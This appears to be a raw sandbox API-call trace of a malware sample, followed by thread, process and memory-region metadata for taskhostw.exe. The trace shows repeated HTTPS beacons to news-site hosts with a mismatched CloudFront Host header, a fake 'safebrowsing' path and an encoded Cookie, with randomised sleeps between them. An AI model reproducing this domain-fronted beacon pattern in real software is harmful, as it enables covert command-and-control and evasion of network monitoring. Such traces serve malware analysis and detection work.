[0591.941] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0591.941] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0591.941] InternetConnectA (hInternet=0xcc0004, lpszServerName="asset.wsj.net", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0591.941] GetLastError () returned 0x0
[0591.941] SetLastError (dwErrCode=0x0)
[0591.941] htonl (hostlong=0xa000000) returned 0xa
[0591.941] htonl (hostlong=0x22000000) returned 0x22
[0591.941] GetLastError () returned 0x0
[0591.941] SetLastError (dwErrCode=0x0)
[0591.941] htonl (hostlong=0xa000000) returned 0xa
[0591.941] htonl (hostlong=0x47000000) returned 0x47
[0591.941] GetLastError () returned 0x0
[0591.941] SetLastError (dwErrCode=0x0)
[0591.941] htonl (hostlong=0xa000000) returned 0xa
[0591.941] htonl (hostlong=0x1f000000) returned 0x1f
[0591.941] GetLastError () returned 0x0
[0591.941] SetLastError (dwErrCode=0x0)
[0591.941] htonl (hostlong=0x7000000) returned 0x7
[0591.941] htonl (hostlong=0x0) returned 0x0
[0591.941] htonl (hostlong=0x8000000) returned 0x8
[0591.941] htonl (hostlong=0x2000000) returned 0x2
[0591.941] htonl (hostlong=0x8000000) returned 0x8
[0591.941] htonl (hostlong=0x6000000) returned 0x6
[0591.941] htonl (hostlong=0x6000000) returned 0x6
[0591.941] GetLastError () returned 0x0
[0591.941] SetLastError (dwErrCode=0x0)
[0591.941] htonl (hostlong=0x0) returned 0x0
[0591.941] GetLastError () returned 0x0
[0591.941] SetLastError (dwErrCode=0x0)
[0591.941] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0591.941] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0591.941] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0591.941] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0592.613] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0592.613] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0592.613] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0592.613] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x26, wSecond=0x24, wMilliseconds=0x3ac))
[0592.613] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0592.613] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0592.613] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x26, wSecond=0x24, wMilliseconds=0x3ac))
[0592.613] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x383b50) returned 1
[0592.613] CryptGenRandom (in: hProv=0x383b50, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0592.613] CryptReleaseContext (hProv=0x383b50, dwFlags=0x0) returned 1
[0592.613] Sleep (dwMilliseconds=0x365d)
[0602.624] GetLastError () returned 0x0
[0602.624] SetLastError (dwErrCode=0x0)
[0602.624] GetLastError () returned 0x0
[0602.624] SetLastError (dwErrCode=0x0)
[0602.624] GetLastError () returned 0x0
[0602.624] SetLastError (dwErrCode=0x0)
[0602.624] GetLastError () returned 0x0
[0602.624] SetLastError (dwErrCode=0x0)
[0602.624] GetLastError () returned 0x0
[0602.624] SetLastError (dwErrCode=0x0)
[0602.624] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0602.624] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0602.624] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0602.624] InternetConnectA (hInternet=0xcc0004, lpszServerName="www.reutersmedia.net", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0602.624] GetLastError () returned 0x0
[0602.624] SetLastError (dwErrCode=0x0)
[0602.624] htonl (hostlong=0xa000000) returned 0xa
[0602.624] htonl (hostlong=0x22000000) returned 0x22
[0602.624] GetLastError () returned 0x0
[0602.624] SetLastError (dwErrCode=0x0)
[0602.624] htonl (hostlong=0xa000000) returned 0xa
[0602.624] htonl (hostlong=0x47000000) returned 0x47
[0602.624] GetLastError () returned 0x0
[0602.625] SetLastError (dwErrCode=0x0)
[0602.625] htonl (hostlong=0xa000000) returned 0xa
[0602.625] htonl (hostlong=0x1f000000) returned 0x1f
[0602.625] GetLastError () returned 0x0
[0602.625] SetLastError (dwErrCode=0x0)
[0602.625] htonl (hostlong=0x7000000) returned 0x7
[0602.625] htonl (hostlong=0x0) returned 0x0
[0602.625] htonl (hostlong=0x8000000) returned 0x8
[0602.625] htonl (hostlong=0x2000000) returned 0x2
[0602.625] htonl (hostlong=0x8000000) returned 0x8
[0602.625] htonl (hostlong=0x6000000) returned 0x6
[0602.625] htonl (hostlong=0x6000000) returned 0x6
[0602.625] GetLastError () returned 0x0
[0602.625] SetLastError (dwErrCode=0x0)
[0602.625] htonl (hostlong=0x0) returned 0x0
[0602.625] GetLastError () returned 0x0
[0602.625] SetLastError (dwErrCode=0x0)
[0602.625] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0602.625] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0602.625] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0602.625] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0603.310] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0603.310] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0603.310] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0603.310] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x26, wSecond=0x2f, wMilliseconds=0x276))
[0603.310] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0603.310] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0603.310] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x26, wSecond=0x2f, wMilliseconds=0x276))
[0603.310] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x383798) returned 1
[0603.310] CryptGenRandom (in: hProv=0x383798, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0603.310] CryptReleaseContext (hProv=0x383798, dwFlags=0x0) returned 1
[0603.310] Sleep (dwMilliseconds=0x3140)
[0613.315] GetLastError () returned 0x0
[0613.315] SetLastError (dwErrCode=0x0)
[0613.315] GetLastError () returned 0x0
[0613.315] SetLastError (dwErrCode=0x0)
[0613.315] GetLastError () returned 0x0
[0613.315] SetLastError (dwErrCode=0x0)
[0613.315] GetLastError () returned 0x0
[0613.315] SetLastError (dwErrCode=0x0)
[0613.315] GetLastError () returned 0x0
[0613.315] SetLastError (dwErrCode=0x0)
[0613.315] GetLastError () returned 0x0
[0613.315] SetLastError (dwErrCode=0x0)
[0613.315] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0613.315] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0613.315] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0613.315] InternetConnectA (hInternet=0xcc0004, lpszServerName="maptile.usnews.com", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0613.315] GetLastError () returned 0x0
[0613.315] SetLastError (dwErrCode=0x0)
[0613.315] htonl (hostlong=0xa000000) returned 0xa
[0613.315] htonl (hostlong=0x22000000) returned 0x22
[0613.315] GetLastError () returned 0x0
[0613.315] SetLastError (dwErrCode=0x0)
[0613.315] htonl (hostlong=0xa000000) returned 0xa
[0613.315] htonl (hostlong=0x47000000) returned 0x47
[0613.315] GetLastError () returned 0x0
[0613.315] SetLastError (dwErrCode=0x0)
[0613.315] htonl (hostlong=0xa000000) returned 0xa
[0613.315] htonl (hostlong=0x1f000000) returned 0x1f
[0613.315] GetLastError () returned 0x0
[0613.315] SetLastError (dwErrCode=0x0)
[0613.315] htonl (hostlong=0x7000000) returned 0x7
[0613.315] htonl (hostlong=0x0) returned 0x0
[0613.315] htonl (hostlong=0x8000000) returned 0x8
[0613.315] htonl (hostlong=0x2000000) returned 0x2
[0613.315] htonl (hostlong=0x8000000) returned 0x8
[0613.315] htonl (hostlong=0x6000000) returned 0x6
[0613.315] htonl (hostlong=0x6000000) returned 0x6
[0613.315] GetLastError () returned 0x0
[0613.315] SetLastError (dwErrCode=0x0)
[0613.315] htonl (hostlong=0x0) returned 0x0
[0613.315] GetLastError () returned 0x0
[0613.315] SetLastError (dwErrCode=0x0)
[0613.315] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0613.315] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0613.315] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0613.315] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0614.011] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0614.011] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0614.011] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0614.011] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x26, wSecond=0x3a, wMilliseconds=0x148))
[0614.011] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0614.011] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0614.011] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x26, wSecond=0x3a, wMilliseconds=0x148))
[0614.011] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x3834f0) returned 1
[0614.012] CryptGenRandom (in: hProv=0x3834f0, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0614.012] CryptReleaseContext (hProv=0x3834f0, dwFlags=0x0) returned 1
[0614.012] Sleep (dwMilliseconds=0x3457)
[0624.015] GetLastError () returned 0x0
[0624.015] SetLastError (dwErrCode=0x0)
[0624.015] GetLastError () returned 0x0
[0624.015] SetLastError (dwErrCode=0x0)
[0624.015] GetLastError () returned 0x0
[0624.015] SetLastError (dwErrCode=0x0)
[0624.015] GetLastError () returned 0x0
[0624.015] SetLastError (dwErrCode=0x0)
[0624.015] GetLastError () returned 0x0
[0624.015] SetLastError (dwErrCode=0x0)
[0624.015] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0624.015] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0624.015] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0624.015] InternetConnectA (hInternet=0xcc0004, lpszServerName="asset.wsj.net", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0624.015] GetLastError () returned 0x0
[0624.015] SetLastError (dwErrCode=0x0)
[0624.015] htonl (hostlong=0xa000000) returned 0xa
[0624.016] htonl (hostlong=0x22000000) returned 0x22
[0624.016] GetLastError () returned 0x0
[0624.016] SetLastError (dwErrCode=0x0)
[0624.016] htonl (hostlong=0xa000000) returned 0xa
[0624.016] htonl (hostlong=0x47000000) returned 0x47
[0624.016] GetLastError () returned 0x0
[0624.016] SetLastError (dwErrCode=0x0)
[0624.016] htonl (hostlong=0xa000000) returned 0xa
[0624.016] htonl (hostlong=0x1f000000) returned 0x1f
[0624.016] GetLastError () returned 0x0
[0624.016] SetLastError (dwErrCode=0x0)
[0624.016] htonl (hostlong=0x7000000) returned 0x7
[0624.016] htonl (hostlong=0x0) returned 0x0
[0624.016] htonl (hostlong=0x8000000) returned 0x8
[0624.016] htonl (hostlong=0x2000000) returned 0x2
[0624.016] htonl (hostlong=0x8000000) returned 0x8
[0624.016] htonl (hostlong=0x6000000) returned 0x6
[0624.016] htonl (hostlong=0x6000000) returned 0x6
[0624.016] GetLastError () returned 0x0
[0624.016] SetLastError (dwErrCode=0x0)
[0624.016] htonl (hostlong=0x0) returned 0x0
[0624.016] GetLastError () returned 0x0
[0624.016] SetLastError (dwErrCode=0x0)
[0624.016] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0624.016] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0624.016] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0624.016] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0624.702] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0624.702] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0624.702] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0624.702] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x27, wSecond=0x9, wMilliseconds=0x1e))
[0624.702] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0624.702] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0624.702] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x27, wSecond=0x9, wMilliseconds=0x1e))
[0624.702] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x383138) returned 1
[0624.703] CryptGenRandom (in: hProv=0x383138, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0624.703] CryptReleaseContext (hProv=0x383138, dwFlags=0x0) returned 1
[0624.703] Sleep (dwMilliseconds=0x2f0e)
Thread:
id = 121
os_tid = 0xc70
Thread:
id = 122
os_tid = 0xc74
Thread:
id = 123
os_tid = 0x9a4
Thread:
id = 124
os_tid = 0xddc
Thread:
id = 125
os_tid = 0xe48
Thread:
id = 165
os_tid = 0xa90
Process:
id = "9"
image_name = "taskhostw.exe"
filename = "c:\\windows\\system32\\taskhostw.exe"
page_root = "0x68918000"
os_pid = "0xf6c"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "2"
os_parent_pid = "0x32c"
cmd_line = "taskhostw.exe"
cur_dir = "C:\\Windows\\system32\\"
os_username = "LHNIWSJ\\CIiHmnxMn6Ps"
os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013d92" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1444
start_va = 0x7ffe0000
end_va = 0x7ffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1445
start_va = 0x7354730000
end_va = 0x735474ffff
entry_point = 0x0
region_type = private
name = "private_0x0000007354730000"
filename = ""
Region:
id = 1446
start_va = 0x7354750000
end_va = 0x7354763fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000007354750000"
filename = ""
Region:
id = 1447
start_va = 0x7354770000
end_va = 0x73547effff
entry_point = 0x0
region_type = private
name = "private_0x0000007354770000"
filename = ""
Region:
id = 1448
start_va = 0x73547f0000
end_va = 0x73547f3fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000073547f0000"
filename = ""
Region:
id = 1449
start_va = 0x7354800000
end_va = 0x7354800fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000007354800000"
filename = ""
Region:
id = 1450
start_va = 0x7354810000
end_va = 0x7354811fff
entry_point = 0x0
region_type = private
name = "private_0x0000007354810000"
filename = ""
Region:
id = 1451
start_va = 0x7df5ffa70000
end_va = 0x7ff5ffa6ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffa70000"
filename = ""
Region:
id = 1452
start_va = 0x7ff6c7a80000
end_va = 0x7ff6c7aa2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007ff6c7a80000"
filename = ""
Region:
id = 1453
start_va = 0x7ff6c7aa8000
end_va = 0x7ff6c7aa8fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c7aa8000"
filename = ""
Region:
id = 1454
start_va = 0x7ff6c7aae000
end_va = 0x7ff6c7aaffff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c7aae000"
filename = ""
Region:
id = 1455
start_va = 0x7ff6c7b50000
end_va = 0x7ff6c7b68fff
entry_point = 0x7ff6c7b50000
region_type = mapped_file
name = "taskhostw.exe"
filename = "\\Windows\\System32\\taskhostw.exe" (normalized: "c:\\windows\\system32\\taskhostw.exe")
Region:
id = 1456
start_va = 0x7ffb3d310000
end_va = 0x7ffb3d4d1fff
entry_point = 0x7ffb3d310000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1457
start_va = 0x7354730000
end_va = 0x735473ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000007354730000"
filename = ""
Region:
id = 1458
start_va = 0x7354820000
end_va = 0x73548ddfff
entry_point = 0x7354820000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1459
start_va = 0x7354990000
end_va = 0x7354a8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000007354990000"
filename = ""
Region:
id = 1460
start_va = 0x7ff6c7980000
end_va = 0x7ff6c7a7ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007ff6c7980000"
filename = ""
Region:
id = 1461
start_va = 0x7ffb3a800000
end_va = 0x7ffb3a9dcfff
entry_point = 0x7ffb3a800000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1462
start_va = 0x7ffb3d260000
end_va = 0x7ffb3d30cfff
entry_point = 0x7ffb3d260000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1463
start_va = 0x7354740000
end_va = 0x7354746fff
entry_point = 0x0
region_type = private
name = "private_0x0000007354740000"
filename = ""
Region:
id = 1464
start_va = 0x73548e0000
end_va = 0x735495ffff
entry_point = 0x0
region_type = private
name = "private_0x00000073548e0000"
filename = ""
Region:
id = 1465
start_va = 0x7354960000
end_va = 0x7354966fff
entry_point = 0x0
region_type = private
name = "private_0x0000007354960000"
filename = ""
Region:
id = 1466
start_va = 0x7354b00000
end_va = 0x7354b0ffff
entry_point = 0x0
region_type = private
name = "private_0x0000007354b00000"
filename = ""
Region:
id = 1467
start_va = 0x7ff6c7aac000
end_va = 0x7ff6c7aadfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c7aac000"
filename = ""
Region:
id = 1468
start_va = 0x7ffb39b90000
end_va = 0x7ffb39bfafff
entry_point = 0x7ffb39b90000
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 1469
start_va = 0x7ffb39d60000
end_va = 0x7ffb39d6efff
entry_point = 0x7ffb39d60000
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 1470
start_va = 0x7ffb3bf80000
end_va = 0x7ffb3c0a5fff
entry_point = 0x7ffb3bf80000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1471
start_va = 0x7ffb3c9b0000
end_va = 0x7ffb3ca6dfff
entry_point = 0x7ffb3c9b0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1472
start_va = 0x7ffb3cc70000
end_va = 0x7ffb3ceebfff
entry_point = 0x7ffb3cc70000
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 1473
start_va = 0x7ffb3cf10000
end_va = 0x7ffb3cfacfff
entry_point = 0x7ffb3cf10000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1474
start_va = 0x7354970000
end_va = 0x7354970fff
entry_point = 0x7354970000
region_type = mapped_file
name = "taskhostw.exe.mui"
filename = "\\Windows\\System32\\en-US\\taskhostw.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskhostw.exe.mui")
Region:
id = 1475
start_va = 0x7354980000
end_va = 0x7354980fff
entry_point = 0x0
region_type = private
name = "private_0x0000007354980000"
filename = ""
Region:
id = 1476
start_va = 0x7354a90000
end_va = 0x7354a90fff
entry_point = 0x0
region_type = private
name = "private_0x0000007354a90000"
filename = ""
Region:
id = 1477
start_va = 0x7354b10000
end_va = 0x7354b8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000007354b10000"
